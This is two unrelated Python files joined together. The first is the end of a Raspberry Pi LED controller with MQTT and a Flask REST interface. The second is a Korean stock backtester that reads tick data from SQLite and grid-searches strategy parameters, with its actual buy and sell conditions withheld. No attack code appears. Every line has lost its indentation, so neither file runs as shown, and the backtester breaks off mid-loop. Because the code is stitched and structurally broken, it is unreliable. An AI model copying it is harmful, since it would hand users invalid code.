# See if status has changed
curr_status_json = self._get_status()
curr_status_str = json.dumps(curr_status_json, sort_keys=True)
prev_status_str = json.dumps(self.prev_status, sort_keys=True)
isStateChange = True
if prev_status_str == curr_status_str:
isStateChange = False
curr_status_json.update({'isStateChange': isStateChange})
if self.err_msg:
curr_status_json.update({'error': self.err_msg})
status_msg = json.dumps(curr_status_json)
if HAVE_MQTT:
self.client.publish(f"{self.topic}/resp", status_msg, qos=2, retain=True)
return status_msg
class LEDRGB(LEDPin):
pintype = 'rgb'
def __init__(self, name, pin_r, pin_g, pin_b, color):
self.name = name
if pin_r == None:
raise Exception(f"[{name}] missing red pin number")
if pin_g == None:
raise Exception(f"[{name}] missing green pin number")
if pin_b == None:
raise Exception(f"[{name}] missing blue pin number")
self.pins = [int(pin_r), int(pin_g), int(pin_b)]
if color == 'on':
color = 'white'
elif color == 'off':
color = 'black'
self.color = Color(color)
self.last_on_color = self.color if self.color.lightness > 0 else Color('white')
self._init_pins()
self._set_color(self.color)
self._setup_cmds()
super()._mqtt_listen()
def _setup_cmds(self):
super()._setup_cmds()
self.commands.update({
'color': self._set_color
})
self.defaults = {
'color': [['color', str, 'black']]
}
def _init_pins(self):
pinMode(self.pins[0], OUTPUT)
pinMode(self.pins[1], OUTPUT)
pinMode(self.pins[2], OUTPUT)
def off(self, data=None):
self._set_color({"color": 'black'})
def on(self, data={}):
if 'color' in data:
self._set_color(data)
else:
self._set_color({"color": self.last_on_color})
def _set_color(self, data):
try:
color = Color(data['color'])
except Exception:
color = Color('black')
self.err_msg = 'Invalid color, using black instead'
self.color = Color(round(color[0]), round(color[1]), round(color[2]))
self.level = 1 if self.color.lightness else 0
self._set_last_on_timer()
self._log_level()
digitalWrite(self.pins[0], int(self.color[0]))
digitalWrite(self.pins[1], int(self.color[1]))
digitalWrite(self.pins[2], int(self.color[2]))
def _set_level(self):
if round(self.level):
self.on()
else:
self.off()
def _set_last_on_timer(self):
if self.last_on_timer:
self.last_on_timer.cancel()
self.last_on_timer = None
self.last_on_timer = Timer(2, self._set_last_on)
self.last_on_timer.start()
def _set_last_on(self):
if self.color.lightness:
self.last_on_color = self.color
self.last_on_timer = None
def _log_level(self):
print(f'{datetime.now()}: {self.name} -- setting color to {self.color.html}')
def _get_status(self):
status = super()._get_status()
status.update({
'color': self.color.html,
'level': self.color.lightness,
'switch': 'on' if self.color.lightness else 'off'
})
return status
class LEDPWM(LEDPin):
pintype = 'pwm'
def __init__(self, name, pin, level=0):
self.timer = None
super().__init__(name, pin, level)
self.target = self.level
self.target_time = 0
self.last_on_timer = None
#self.last_on_level = self.level
#self._setup_cmds()
#self._init_pin()
def _init_pin(self):
pinMode(self.pin, PWM_OUTPUT)
def _def_level(self, level):
if level == 'on':
self.level = 1
elif level == 'off':
self.level = 0
else:
self.level = float(level)
def _setup_cmds(self):
super()._setup_cmds()
# Add commands
self.commands.update({
'downto': self.downto,
'upto' : self.upto,
'inc' : self.inc,
'dec' : self.dec,
'set' : self.fade
})
# Set defaults
self.defaults.update({
'downto': [['level', int, 0], ['duration', float, 1]],
'upto': [['level', int, 100], ['duration', float, 1]],
'fade': [['level', int, 0], ['duration', float, 1]],
'inc': [['level', int, 10], ['duration', float, 0]],
'dec': [['level', int, 10], ['duration', float, 0]],
'set': [['level', int, 0], ['duration', float, 0]],
'toggle': [['duration', float, 1]]
})
def on(self, data={}):
if 'level' not in data:
data['level'] = self.last_on_level
self.fade(data)
def off(self, data={}):
data['level'] = 0
self.fade(data)
def inc(self, data={}):
data['level'] = max(min(self.level + data['level'], 100), 0)
self.fade(data)
def dec(self, data={}):
data['level'] = max(min(self.level - data['level'], 100), 0)
self.fade(data)
def fade(self, data):
self._stop_timer()
self.target = max(min(data['level'], 100), 0)
self.prev_level = self.level
now = datetime.now()
if self.level == self.target or data['duration'] == 0:
print(f'{now}: {self.name} -- setting level from {self.level} to {self.target}')
self.level = self.target
self._set_level()
self.toggling = ''
else:
print(f'{now}: {self.name} -- fading from {self.level} to {data["level"]} in {data["duration"]} seconds')
self.target_time = now + timedelta(seconds=data['duration'])
(step_time, step_level) = self._calc_next_step()
self.timer = Timer(step_time, self._fade_step, {step_level})
self.timer.start()
def _fade_step(self, step_level):
done = False
print(f"{self.name}: fading to {step_level})")
if self.target > self.level:
if step_level >= self.target:
done = True
else:
if step_level <= self.target:
done = True
if self.target_time <= datetime.now():
done = True
if done:
self._stop_timer()
self._toggle_complete()
else:
self.level = step_level
(step_time, step_level) = self._calc_next_step()
self.timer = Timer(step_time, self._fade_step, {step_level})
self.timer.start()
self._set_level()
def _toggle_complete(self):
self.toggling = ''
self.level = self.target
if hasattr(self, '_notify_parent'):
self._notify_parent()
def _calc_next_step(self):
nsteps = abs(self.target - self.level) / MIN_STEP_SIZE
timeleft = (self.target_time - datetime.now()).total_seconds()
steptime = timeleft / nsteps
stepsize = (self.target - self.level) / nsteps
steptime2 = max(steptime, MIN_STEP_TIME)
nsteps2 = nsteps * steptime / steptime2
stepsize2 = stepsize * nsteps / nsteps2
return (steptime2, self.level + stepsize2)
def _stop_timer(self):
if isinstance(self.timer, Timer):
self.timer.cancel()
self.timer = None
def _set_level(self):
self._log_level()
self._set_last_on_timer()
pwmWrite(int(self.pin), int(self.level * PWM_MAX / MAX_LEVEL))
def _set_last_on_timer(self):
if self.last_on_timer:
self.last_on_timer.cancel()
self.last_on_timer = None
self.last_on_timer = Timer(2, self._set_last_on)
self.last_on_timer.start()
def _set_last_on(self):
if self.level:
self.last_on_level = self.level
self.last_on_timer = None
def _log_level(self):
#print(f'{datetime.now()}: {self.name} -- target={self.target} by {self.target_time}, level={self.level}')
pass
def downto(self, data):
if self.level > data['level']:
self.fade(data)
def upto(self, data):
if self.level < data['level']:
self.fade(data)
def _get_status(self):
return {
'level' : self.target,
'switch': 'on' if self.target else 'off',
}
class LEDPCA(LEDPWM):
pintype = 'pca'
def __init__(self, name, pin=0, level=0):
if not HAVE_PCA:
raise Exception(f"Failed to load pca9685 module required for [{name}]")
super().__init__(name, pin, level)
def _init_pin(self):
pass
def _set_level(self):
super()._log_level()
pca.channels[int(self.pin)].duty_cycle = int(self.level * PCA_MAX / MAX_LEVEL)
class LEDPCARGB(LEDPCA):
pintype = 'pcargb'
def __init__(self, name, pin_r, pin_g, pin_b, color):
self.name = name
if pin_r == None:
raise Exception(f"[{name}] missing red pin number")
if pin_g == None:
raise Exception(f"[{name}] missing green pin number")
if pin_b == None:
raise Exception(f"[{name}] missing blue pin number")
if color == 'on':
color = 'white'
elif color == 'off':
color = 'black'
self.color = Color(color)
self.last_on_color = self.color if self.color.lightness > 0 else Color('white')
self.last_on_timer = None
# Create 3 PCA LED's
self.led_r = LEDPCA(name + "_r", pin_r, self.color[0])
self.led_g = LEDPCA(name + "_g", pin_g, self.color[1])
self.led_b = LEDPCA(name + "_b", pin_b, self.color[2])
self.led_r._notify_parent = self._update_color
self.led_g._notify_parent = self._update_color
self.led_b._notify_parent = self._update_color
self._set_color(self.color)
self._setup_cmds()
super()._mqtt_listen()
def _init_pins(self):
pass
def _setup_cmds(self):
super()._setup_cmds()
self.commands.update({
'color' : self.set_color,
'hsv' : self.set_hsv,
'set_hue': self.set_hue,
'set_sat': self.set_sat
})
# Extra args for colors
self.defaults.update({
'inc': [['level', int, 10], ['duration', float, 0],
['red', int, 0], ['green', int, 0], ['blue', int, 0]],
'dec': [['level', int, 10], ['duration', float, 0],
['red', int, 0], ['green', int, 0], ['blue', int, 0]],
'color': [['color', str, 'black'], ['duration', float, 1]],
'hsv': [['hue', int, 0], ['saturation', int, 0],
['value', int, 0], ['duration', float, 0]],
'set_hue': [['hue', int, 0], ['duration', float, 0]],
'set_sat': [['saturation', int, 0], ['duration', float, 0]]
})
def _set_color(self, data):
try:
self.color = Color(data['color'])
except Exception:
self.color = Color('black')
self.err_msg = 'Invalid color, using black instead'
self.level = self.color.lightness
self._set_last_on_timer()
self.led_r.level = self.color[0]
self.led_g.level = self.color[1]
self.led_b.level = self.color[2]
self.led_r._set_level()
self.led_g._set_level()
self.led_b._set_level()
self._update_color()
def inc(self, data={}):
if data['level'] and not data['red'] and not data['green'] and not data['blue']:
data['red'] = data['green'] = data['blue'] = data['level']
data['level'] = 0
data['red'] = max(min(int(self.color[0]*100) + data['red'], 100), 0)
data['green'] = max(min(int(self.color[1]*100) + data['green'], 100), 0)
data['blue'] = max(min(int(self.color[2]*100) + data['blue'], 100), 0)
self.fade(data)
def dec(self, data={}):
if data['level'] and not data['red'] and not data['green'] and not data['blue']:
data['red'] = data['green'] = data['blue'] = data['level']
data['level'] = 0
data['red'] = max(min(int(self.color[0]*100) - data['red'], 100), 0)
data['green'] = max(min(int(self.color[1]*100) - data['green'], 100), 0)
data['blue'] = max(min(int(self.color[2]*100) - data['blue'], 100), 0)
self.fade(data)
def upto(self, data):
data.update({
'red': max(self.color[0]*100, data['level']),
'green': max(self.color[1]*100, data['level']),
'blue': max(self.color[2]*100, data['level']),
'level': 0
})
self.fade(data)
def downto(self, data):
data.update({
'red': min(self.color[0]*100, data['level']),
'green': min(self.color[1]*100, data['level']),
'blue': min(self.color[2]*100, data['level']),
'level': 0
})
self.fade(data)
def on(self, data):
self.fade({'color': self.last_on_color.html, 'duration': data['duration']})
def off(self, data):
self.fade({'color': 'black', 'duration': data['duration']})
def fade(self, data={}):
self._update_color()
defaults = {'red': 0, 'green': 0, 'blue': 0, 'color': 'black', 'level': 0}
defaults.update(data)
data = defaults
if data['color'] and not data['level'] and not data['red'] and not data['green'] and not data['blue']:
r,g,b = Color(data['color'])
data['red'] = r*100
data['green'] = g*100
data['blue'] = b*100
elif data['level'] and not data['red'] and not data['green'] and not data['blue']:
data['red'] = data['green'] = data['blue'] = data['level']
self.led_r.fade({'level': data['red'], 'duration': data['duration']})
self.led_g.fade({'level': data['green'], 'duration': data['duration']})
self.led_b.fade({'level': data['blue'], 'duration': data['duration']})
self.color = Color(
self.led_r.target/100,
self.led_g.target/100,
self.led_b.target/100
)
def toggle(self, data={}):
toggling = self.led_r.toggling + self.led_g.toggling + self.led_b.toggling
self._update_color()
if self.color.lightness or 'on' in toggling:
self.led_r.toggling = 'off'
self.led_g.toggling = 'off'
self.led_b.toggling = 'off'
self.led_r.off(data)
self.led_g.off(data)
self.led_b.off(data)
else:
r,g,b = self.last_on_color
self.led_r.toggling = self.led_g.toggling = self.led_b.toggling = 'on'
data.update({'level': r*100})
self.led_r.on(data)
data.update({'level': g*100})
self.led_g.on(data)
data.update({'level': b*100})
self.led_b.on(data)
def set_color(self, data=None):
try:
self.color = Color(data['color'])
except Exception:
self.color = Color('black')
self.err_msg = 'Invalid color, using black instead'
self.apply_color(data)
def set_hsv(self, data=None):
try:
self.color = Color(
h=data['hue']/100,
s=data['saturation']/100,
v=data['value']/100
)
except Exception:
self.color = Color('black')
self.err_msg = 'Invalid color, using black instead'
self.apply_color(data)
def set_hue(self, data=None):
try:
h,s,v = self.color.hsv
self.color = Color(h=data['hue']/100, s=s, v=v)
except Exception:
self.color = Color('black')
self.err_msg = 'Invalid color, using black instead'
self.apply_color(data)
def set_sat(self, data=None):
try:
h,s,v = self.color.hsv
self.color = Color(h=h, s=data['saturation']/100, v=v)
except Exception:
self.color = Color('black')
self.err_msg = 'Invalid color, using black instead'
self.apply_color(data)
def apply_color(self, data=None):
self.fade({
'red' : self.color[0]*100,
'green': self.color[1]*100,
'blue' : self.color[2]*100,
'duration': data['duration']
})
def _update_color(self):
self.color = Color(
self.led_r.level/100,
self.led_g.level/100,
self.led_b.level/100
)
self.level = int(self.color.lightness * 100)
def _set_last_on(self):
if self.color.lightness:
self.last_on_color = self.color
self.last_on_timer = None
def _get_status(self):
return {
'color' : self.color.html,
'level' : self.color.lightness,
'switch': 'on' if self.color.lightness else 'off'
}
if HAVE_REST:
app = Flask(__name__)
def parse_config():
if config.sections():
for section in config.sections():
if section == 'mqtt' or section == 'rest':
continue
level = config[section].get('default', 'off').lower()
pintype = config[section].get('type', 'onoff').lower()
pin = config[section].get('pin', None)
# Setup LED driver based on pintype
if pintype == 'onoff':
leds[section] = LEDPin(section, pin, level)
elif pintype == 'pwm':
leds[section] = LEDPWM(section, pin, level)
elif pintype == 'rgb':
leds[section] = LEDRGB(section,
config[section]['red'],
config[section]['green'],
config[section]['blue'],
config[section].get('default', 'black').lower()
)
elif pintype == 'pca9685':
leds[section] = LEDPCA(section, pin, level)
elif pintype == 'pcargb':
leds[section] = LEDPCARGB(section,
config[section]['red'],
config[section]['green'],
config[section]['blue'],
config[section].get('default', 'black').lower()
)
else:
raise Exception(f"[{section}] unknown pin type '{pintype}'")
if 'mqtt' not in config.sections():
config['mqtt'] = {'topic': 'led', 'broker': 'mqtt-broker'}
if 'rest' not in config.sections():
config['rest'] = {'port': 8123}
else:
# Default to using a single PWM LED on pin 18
leds['led'] = LEDPWM('led', PWM_PIN, 0)
def rest_listen():
base_url = config['rest'].get('base', '')
if base_url:
base_url = '/' + base_url
@app.route(base_url + '/<name>/<func>', methods=['GET'])
@app.route(base_url + '/<name>/<func>/<argone>', methods=['GET'])
@app.route(base_url + '/<name>/<func>/<argone>/<argtwo>', methods=['GET'])
def dispatch(name, func, argone=None, argtwo=None):
if name in leds:
led = leds[name]
if func in led.commands:
data = {'cmd': func}
led._set_default_args_rest(data, [argone, argtwo])
led.prev_status = led._get_status()
led.commands[func](data)
return led.send_status()
else:
abort(404)
else:
abort(404)
print(f"REST interface listening on port {config['rest']['port']} with url={base_url}/")
app.run(host='0.0.0.0', port=config['rest']['port'])
if __name__ == '__main__':
leds = {}
wiringPiSetupGpio()
if HAVE_PCA:
try:
pca = PCA9685(busio.I2C(SCL, SDA))
pca.frequency = 1000
except ValueError:
HAVE_PCA = False
config = configparser.ConfigParser()
config.read('/etc/led-controller.ini')
parse_config()
if HAVE_REST:
rest_thread = Thread(target=rest_listen)
rest_thread.start()
try:
Event().wait()
except KeyboardInterrupt:
os._exit(1)
|
backtester_stock_vc.py
|
import os
import sys
import sqlite3
import pandas as pd
from matplotlib import pyplot as plt
from multiprocessing import Process, Queue
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import DB_SETTING, DB_BACKTEST, DB_STOCK_TICK, GRAPH_PATH
from utility.static import now, strf_time, strp_time, timedelta_sec, timedelta_day
class BackTester1Stock:
def __init__(self, q_, code_list_, num_, df_mt_, high):
self.q = q_
self.code_list = code_list_
self.df_mt = df_mt_
self.high = high
if type(num_[5]) == list:
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.starttime = num_[3]
self.endtime = num_[4]
self.gap_ch = num_[5][0]
self.avg_time = num_[6][0]
self.gap_sm = num_[7][0]
self.ch_low = num_[8][0]
self.dm_low = num_[9][0]
self.per_low = num_[10][0]
self.per_high = num_[11][0]
self.cs_per = num_[12][0]
else:
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.starttime = num_[3]
self.endtime = num_[4]
self.gap_ch = num_[5]
self.avg_time = num_[6]
self.gap_sm = num_[7]
self.ch_low = num_[8]
self.dm_low = num_[9]
self.per_low = num_[10]
self.per_high = num_[11]
self.cs_per = num_[12]
self.code = None
self.df = None
self.totalcount = 0
self.totalcount_p = 0
self.totalcount_m = 0
self.totalholdday = 0
self.totaleyun = 0
self.totalper = 0.
self.hold = False
self.buycount = 0
self.buyprice = 0
self.sellprice = 0
self.index = 0
self.indexb = 0
self.indexn = 0
self.ccond = 0
self.csell = 0
self.Start()
def Start(self):
conn = sqlite3.connect(DB_STOCK_TICK)
tcount = len(self.code_list)
int_daylimit = int(strf_time('%Y%m%d', timedelta_day(-self.testperiod)))
for k, code in enumerate(self.code_list):
self.code = code
self.df = pd.read_sql(f"SELECT * FROM '{code}'", conn)
self.df = self.df.set_index('index')
self.df['직전거래대금'] = self.df['거래대금'].shift(1)
self.df['직전체결강도'] = self.df['체결강도'].shift(1)
self.df['거래대금평균'] = self.df['직전거래대금'].rolling(window=self.avg_time).mean()
self.df['체결강도평균'] = self.df['직전체결강도'].rolling(window=self.avg_time).mean()
self.df['최고체결강도'] = self.df['직전체결강도'].rolling(window=self.avg_time).max()
self.df = self.df.fillna(0)
self.totalcount = 0
self.totalcount_p = 0
self.totalcount_m = 0
self.totalholdday = 0
self.totaleyun = 0
self.totalper = 0.
self.ccond = 0
lasth = len(self.df) - 1
for h, index in enumerate(self.df.index):
if h != 0 and index[:8] != self.df.index[h - 1][:8]:
self.ccond = 0
if int(index[:8]) < int_daylimit or \
(not self.hold and (self.endtime <= int(index[8:]) or int(index[8:]) < self.starttime)):
continue
self.index = index
self.indexn = h
self.ccond += 1
if not self.hold and self.starttime < int(index[8:]) < self.endtime and self.BuyTerm():
self.Buy()
elif self.hold and self.starttime < int(index[8:]) < self.endtime and self.SellTerm():
self.Sell()
elif self.hold and (h == lasth or int(index[8:]) >= self.endtime > int(self.df.index[h - 1][8:])):
self.Sell()
self.Report(k + 1, tcount)
conn.close()
def BuyTerm(self):
try:
if self.code not in self.df_mt['거래대금상위100'][self.index]:
self.ccond = 0
else:
self.ccond += 1
except KeyError:
return False
if self.ccond < self.avg_time:
return False
# 전략 비공개
return True
def Buy(self):
if self.df['매도호가1'][self.index] * self.df['매도잔량1'][self.index] >= self.batting:
s1hg = self.df['매도호가1'][self.index]
self.buycount = int(self.batting / s1hg)
self.buyprice = s1hg
else:
s1hg = self.df['매도호가1'][self.index]
s1jr = self.df['매도잔량1'][self.index]
s2hg = self.df['매도호가2'][self.index]
ng = self.batting - s1hg * s1jr
s2jc = int(ng / s2hg)
self.buycount = s1jr + s2jc
self.buyprice = round((s1hg * s1jr + s2hg * s2jc) / self.buycount, 2)
if self.buycount == 0:
return
self.hold = True
self.indexb = self.indexn
self.csell = 0
def SellTerm(self):
if self.df['등락율'][self.index] > 29:
return True
bg = self.buycount * self.buyprice
cg = self.buycount * self.df['현재가'][self.index]
eyun, per = self.GetEyunPer(bg, cg)
# 전략 비공개
return False
def Sell(self):
if self.df['매수잔량1'][self.index] >= self.buycount:
self.sellprice = self.df['매수호가1'][self.index]
else:
b1hg = self.df['매수호가1'][self.index]
b1jr = self.df['매수잔량1'][self.index]
b2hg = self.df['매수호가2'][self.index]
nc = self.buycount - b1jr
self.sellprice = round((b1hg * b1jr + b2hg * nc) / self.buycount, 2)
self.hold = False
self.CalculationEyun()
self.indexb = 0
def CalculationEyun(self):
self.totalcount += 1
bg = self.buycount * self.buyprice
cg = self.buycount * self.sellprice
eyun, per = self.GetEyunPer(bg, cg)
self.totalper = round(self.totalper + per, 2)
self.totaleyun = int(self.totaleyun + eyun)
self.totalholdday += self.indexn - self.indexb
if per > 0:
self.totalcount_p += 1
else:
self.totalcount_m += 1
if self.high:
self.q.put([self.index, self.code, per, eyun])
# noinspection PyMethodMayBeStatic
def GetEyunPer(self, bg, cg):
gtexs = cg * 0.0023
gsfee = cg * 0.00015
gbfee = bg * 0.00015
texs = gtexs - (gtexs % 1)
sfee = gsfee - (gsfee % 10)
bfee = gbfee - (gbfee % 10)
pg = int(cg - texs - sfee - bfee)
eyun = pg - bg
per = round(eyun / bg * 100, 2)
return eyun, per
def Report(self, count, tcount):
if self.totalcount > 0:
plus_per = round((self.totalcount_p / self.totalcount) * 100, 2)
avgholdday = round(self.totalholdday / self.totalcount, 2)
self.q.put([self.code, self.totalcount, avgholdday, self.totalcount_p, self.totalcount_m,
plus_per, self.totalper, self.totaleyun])
totalcount, avgholdday, totalcount_p, totalcount_m, plus_per, totalper, totaleyun = \
self.GetTotal(plus_per, avgholdday)
print(f" 종목코드 {self.code} | 평균보유기간 {avgholdday}초 | 거래횟수 {totalcount}회 | "
f" 익절 {totalcount_p}회 | 손절 {totalcount_m}회 | 승률 {plus_per}% |"
f" 수익률 {totalper}% | 수익금 {totaleyun}원 [{count}/{tcount}]")
else:
self.q.put([self.code, 0, 0, 0, 0, 0., 0., 0])
def GetTotal(self, plus_per, avgholdday):
totalcount = str(self.totalcount)
totalcount = ' ' + totalcount if len(totalcount) == 1 else totalcount
totalcount = ' ' + totalcount if len(totalcount) == 2 else totalcount
avgholdday = str(avgholdday)
avgholdday = ' ' + avgholdday if len(avgholdday.split('.')[0]) == 1 else avgholdday
avgholdday = ' ' + avgholdday if len(avgholdday.split('.')[0]) == 2 else avgholdday
avgholdday = ' ' + avgholdday if len(avgholdday.split('.')[0]) == 3 else avgholdday
avgholdday = avgholdday + '0' if len(avgholdday.split('.')[1]) == 1 else avgholdday
totalcount_p = str(self.totalcount_p)
totalcount_p = ' ' + totalcount_p if len(totalcount_p) == 1 else totalcount_p
totalcount_p = ' ' + totalcount_p if len(totalcount_p) == 2 else totalcount_p
totalcount_m = str(self.totalcount_m)
totalcount_m = ' ' + totalcount_m if len(totalcount_m) == 1 else totalcount_m
totalcount_m = ' ' + totalcount_m if len(totalcount_m) == 2 else totalcount_m
plus_per = str(plus_per)
plus_per = ' ' + plus_per if len(plus_per.split('.')[0]) == 1 else plus_per
plus_per = ' ' + plus_per if len(plus_per.split('.')[0]) == 2 else plus_per
plus_per = plus_per + '0' if len(plus_per.split('.')[1]) == 1 else plus_per
totalper = str(self.totalper)
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 1 else totalper
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 2 else totalper
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 3 else totalper
totalper = totalper + '0' if len(totalper.split('.')[1]) == 1 else totalper
totaleyun = format(self.totaleyun, ',')
if len(totaleyun.split(',')) == 1:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 2 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 3 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 4 else totaleyun
elif len(totaleyun.split(',')) == 2:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 2 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 3 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 4 else totaleyun
elif len(totaleyun.split(',')) == 3:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
return totalcount, avgholdday, totalcount_p, totalcount_m, plus_per, totalper, totaleyun
class Total:
def __init__(self, q_, last_, num_, df1_):
super().__init__()
self.q = q_
self.last = last_
self.name = df1_
if type(num_[5]) == list:
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.starttime = num_[3]
self.endtime = num_[4]
self.gap_ch = num_[5][0]
self.avg_time = num_[6][0]
self.gap_sm = num_[7][0]
self.ch_low = num_[8][0]
self.dm_low = num_[9][0]
self.per_low = num_[10][0]
self.per_high = num_[11][0]
self.cs_per = num_[12][0]
else:
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.starttime = num_[3]
self.endtime = num_[4]
self.gap_ch = num_[5]
self.avg_time = num_[6]
self.gap_sm = num_[7]
self.ch_low = num_[8]
self.dm_low = num_[9]
self.per_low = num_[10]
self.per_high = num_[11]
self.cs_per = num_[12]
self.Start()
def Start(self):
columns1 = ['거래횟수', '평균보유기간', '익절', '손절', '승률', '수익률', '수익금']
columns2 = ['필요자금', '종목출현빈도수', '거래횟수', '평균보유기간', '익절', '손절', '승률',
'평균수익률', '수익률합계', '수익금합계', '체결강도차이', '평균시간', '거래대금차이',
'체결강도하한', '누적거래대금하한', '등락율하한', '등락율상한', '청산수익률']
df_back = pd.DataFrame(columns=columns1)
df_tsg = pd.DataFrame(columns=['종목명', 'per', 'ttsg'])
k = 0
while True:
data = self.q.get()
if len(data) == 4:
name = self.name['종목명'][data[1]]
if data[0] in df_tsg.index:
df_tsg.at[data[0]] = df_tsg['종목명'][data[0]] + ';' + name, \
df_tsg['per'][data[0]] + data[2], \
df_tsg['ttsg'][data[0]] + data[3]
else:
df_tsg.at[data[0]] = name, data[2], data[3]
else:
df_back.at[data[0]] = data[1], data[2], data[3], data[4], data[5], data[6], data[7]
k += 1
if k == self.last:
break
tsp = 0
if len(df_back) > 0:
text = [self.gap_ch, self.avg_time, self.gap_sm, self.ch_low, self.dm_low,
self.per_low, self.per_high, self.cs_per]
print(f' {text}')
tc = df_back['거래횟수'].sum()
if tc != 0:
pc = df_back['익절'].sum()
mc = df_back['손절'].sum()
pper = round(pc / tc * 100, 2)
df_back_ = df_back[df_back['평균보유기간'] != 0]
avghold = round(df_back_['평균보유기간'].sum() / len(df_back_), 2)
avgsp = round(df_back['수익률'].sum() / tc, 2)
tsg = int(df_back['수익금'].sum())
onedaycount = round(tc / self.totaltime, 4)
onegm = int(self.batting * onedaycount * avghold)
if onegm < self.batting:
onegm = self.batting
tsp = round(tsg / onegm * 100, 4)
text = f" 종목당 배팅금액 {format(self.batting, ',')}원, 필요자금 {format(onegm, ',')}원, "\
f" 종목출현빈도수 {onedaycount}개/초, 거래횟수 {tc}회, 평균보유기간 {avghold}초,\n 익절 {pc}회, "\
f" 손절 {mc}회, 승률 {pper}%, 평균수익률 {avgsp}%, 수익률합계 {tsp}%, 수익금합계 {format(tsg, ',')}원"
print(text)
df_back = pd.DataFrame(
[[onegm, onedaycount, tc, avghold, pc, mc, pper, avgsp, tsp, tsg, self.gap_ch, self.avg_time,
self.gap_sm, self.ch_low, self.dm_low, self.per_low, self.per_high, self.cs_per]],
columns=columns2, index=[strf_time('%Y%m%d%H%M%S')])
conn = sqlite3.connect(DB_BACKTEST)
df_back.to_sql(f"{strf_time('%Y%m%d')}_1c", conn, if_exists='append', chunksize=1000)
conn.close()
if len(df_tsg) > 0:
df_tsg['체결시간'] = df_tsg.index
df_tsg.sort_values(by=['체결시간'], inplace=True)
df_tsg['ttsg_cumsum'] = df_tsg['ttsg'].cumsum()
df_tsg[['ttsg', 'ttsg_cumsum']] = df_tsg[['ttsg', 'ttsg_cumsum']].astype(int)
conn = sqlite3.connect(DB_BACKTEST)
df_tsg.to_sql(f"{strf_time('%Y%m%d')}_it", conn, if_exists='replace', chunksize=1000)
conn.close()
df_tsg.plot(figsize=(12, 9), rot=45)
plt.savefig(f"{GRAPH_PATH}/S{strf_time('%Y%m%d')}_1.png")
conn = sqlite3.connect(DB_SETTING)
cur = conn.cursor()
query = f"UPDATE stock SET 종목당투자금 = {self.batting}, 백테스팅기간 = {self.testperiod}, "\
f"백테스팅시간 = {self.totaltime}, 시작시간 = {self.starttime}, 종료시간 = {self.endtime}, "\
f"체결강도차이 = {self.gap_ch}, 평균시간 = {self.avg_time}, 거래대금차이 = {self.gap_sm}, "\
f"체결강도하한 = {self.ch_low}, 누적거래대금하한 = {self.dm_low}, 등락율하한 = {self.per_low}, "\
f"등락율상한 = {self.per_high}, 청산수익률 = {self.cs_per}"
cur.execute(query)
conn.commit()
conn.close()
else:
self.q.put(tsp)
if __name__ == "__main__":
start = now()
con = sqlite3.connect(DB_STOCK_TICK)
df1 = pd.read_sql('SELECT * FROM codename', con)
df1 = df1.set_index('index')
df2 = pd.read_sql("SELECT name FROM sqlite_master WHERE TYPE = 'table'", con)
df3 = pd.read_sql('SELECT * FROM moneytop', con)
df3 = df3.set_index('index')
con.close()
table_list = list(df2['name'].values)
table_list.remove('moneytop')
table_list.remove('codename')
last = len(table_list)
q = Queue()
batting = int(sys.argv[1]) * 1000000
testperiod = int(sys.argv[2])
totaltime = int(sys.argv[3])
starttime = int(sys.argv[4])
endtime = int(sys.argv[5])
gap_chs = [float(sys.argv[6]), float(sys.argv[7]), float(sys.argv[8]),
float(sys.argv[9]), float(sys.argv[10]), float(sys.argv[11]), float(sys.argv[12])]
avg_times = [int(sys.argv[15]), int(sys.argv[16]), int(sys.argv[17]),
int(sys.argv[18]), int(sys.argv[19]), int(sys.argv[20])]
htsp = -1000
high_var = []
for gap_ch in gap_chs:
for avg_time in avg_times:
num = [batting, testperiod, totaltime, starttime, endtime, gap_ch, avg_time,
int(sys.argv[23]), float(sys.argv[27]), int(sys.argv[31]), float(sys.argv[35]),
float(sys.argv[39]), float(sys.argv[43])]
w = Process(target=Total, args=(q, last, num, df1))
w.start()
procs = []
workcount = int(last / int(sys.argv[47])) + 1
for j in range(0, last, workcount):
code_list = table_list[j:j + workcount]
p = Process(target=BackTester1Stock, args=(q, code_list, num, df3, False))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
sp = q.get()
if sp >= htsp:
htsp = sp
high_var = num
print(f' 최고수익률 갱신 {htsp}%')
gap_ch = [high_var[5] - float(sys.argv[13]) * 9, high_var[5] + float(sys.argv[13]) * 9,
float(sys.argv[13]), float(sys.argv[14])]
avg_time = [high_var[6], high_var[6], int(sys.argv[21]), int(sys.argv[22])]
gap_sm = [int(sys.argv[23]), int(sys.argv[24]), int(sys.argv[25]), int(sys.argv[26])]
ch_low = [float(sys.argv[27]), float(sys.argv[28]), float(sys.argv[29]), float(sys.argv[30])]
dm_low = [int(sys.argv[31]), int(sys.argv[32]), int(sys.argv[33]), int(sys.argv[34])]
per_low = [float(sys.argv[35]), float(sys.argv[36]), float(sys.argv[37]), float(sys.argv[38])]
per_high = [float(sys.argv[39]), float(sys.argv[40]), float(sys.argv[41]), float(sys.argv[42])]
cs_per = [float(sys.argv[43]), float(sys.argv[44]), float(sys.argv[45]), float(sys.argv[46])]
num = [batting, testperiod, totaltime, starttime, endtime,
gap_ch, avg_time, gap_sm, ch_low, dm_low, per_low, per_high, cs_per]
ogin_var = high_var[5]
high_var = high_var[5]
i = 5
while True:
w = Process(target=Total, args=(q, last, num, df1))
w.start()
